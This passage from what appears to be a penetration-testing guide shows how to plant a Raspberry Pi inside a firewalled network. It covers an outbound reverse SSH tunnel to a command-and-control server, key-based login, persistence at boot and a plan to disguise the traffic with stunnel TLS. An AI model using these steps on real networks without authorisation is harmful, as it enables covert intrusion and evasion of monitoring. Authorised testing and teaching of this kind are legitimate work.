Setting up a reverse SSH tunnel

Now that SSH is working on both hosts, we need to set up the reverse SSH tunnel. Taking a look at the following figure showing a simplified topology, there is a pretty big problem here that justifies why we need to set up a reverse SSH tunnel:

Do you see it? Well, in case you don't, the issue is that our internal Raspberry Pi server is not reachable externally, since the corporate firewall is blocking it. There are no inbound rules or NAT polices in place to handle this sort of connection. So I have no issues connecting to the C&C server; however I will need to have the C&C server connecting back to the Raspberry Pi. So, how do we do this? Well, this is where a reverse SSH tunnel comes in.

What a reverse SSH tunnel allows us to do is have a persistent tunnel setup initiated from the inside host to the C&C server with the -R flag as well as a predefined port. Because of this flag, when you SSH on the C&C server to itself on this predefined port, you will piggyback off of that already established tunnel.

In the following figure, you can see how the reverse SSH tunnel works to solve our issue:

Based on the preceding figure, here is my configuration for setting up the reverse SSH tunnel:

1. On the Raspberry Pi (my internal box), connect to the outside C&C server with the -R flag as well as the port you plan to use as the redirection port:

ssh –R 8022:localhost:22 mycandcserver.mydomain.com

1. Now, to reference this tunnel on the C&C server, you will just run this command and will be seamlessly connected to your internal server without any firewalls or NAT rules added.

ssh –p 8022 localhost

Everything works as test, great! However, we are not quite done yet. There is one more catch. What happens if your Raspberry Pi reboots? You will have to console back in and reconnect that tunnel to your C&C server. To prevent this problem from occurring, you will need to automate tunnel creation on startup. The one issue with automating the preceding commands is that the session is typically interactive and needs a password input. To overcome this, you will use a key-based authentication setup:

1. Generate a key pair on the inside server or the server that will be initiating the SSH session. Make sure that you generate the key as the user you plan to log in as:

1. Log into the C&C server, and navigate to the root of the home directory. Create a .ssh directory if one does not exist.
2. Within this .ssh directory, copy the id_rsa.pub file that was just created from the inside server to the .ssh directory on the C&C server.
3. Once this is complete, it is time to test it. Log onto your inside server, in my case, the Raspberry Pi. Now, ssh to your C&C server. You should be asked whether you want to continue the first time so you can accept the key. After selecting yes, you should be logged in without being prompted for a password. Log out and try the SSH session again. You should be able to get right into the C&C server without any input:

Now that we have the ssh tunnels built and working without any input, we want to work on hiding all this traffic within a TLS tunnel. There are lots of security devices that may filter SSH outbound or may raise some additional flags. Fortunately, SSL/TLS is typically allowed through firewalls, so having the traffic flow through a SSL/TLS tunnel would be an added bonus. Luckily, stunnel is a great utility to use for this purpose. Now, let me demonstrate how I can set up stunnel and get it working before we tie it all together. But before we get to stunnel, we have to make sure that our ssh connection will launch on startup so that we can reverse-ssh at any time:

1. First, let's navigate to the if-up.d directory. I will create a file in that directory that will execute on startup. I will call this file outbound-ssh, and make sure that its executable with the -x flag. Finally, I will edit the file. In my case, I will be using vi:

1. Then, I just need to create the script within the file that will execute:

1. There are lots of options in terms of how to get this script to run on boot. I insert the command in the /etc/rc.local so that it boots on startup. I just call the script as-is:

/root/outbound-ssh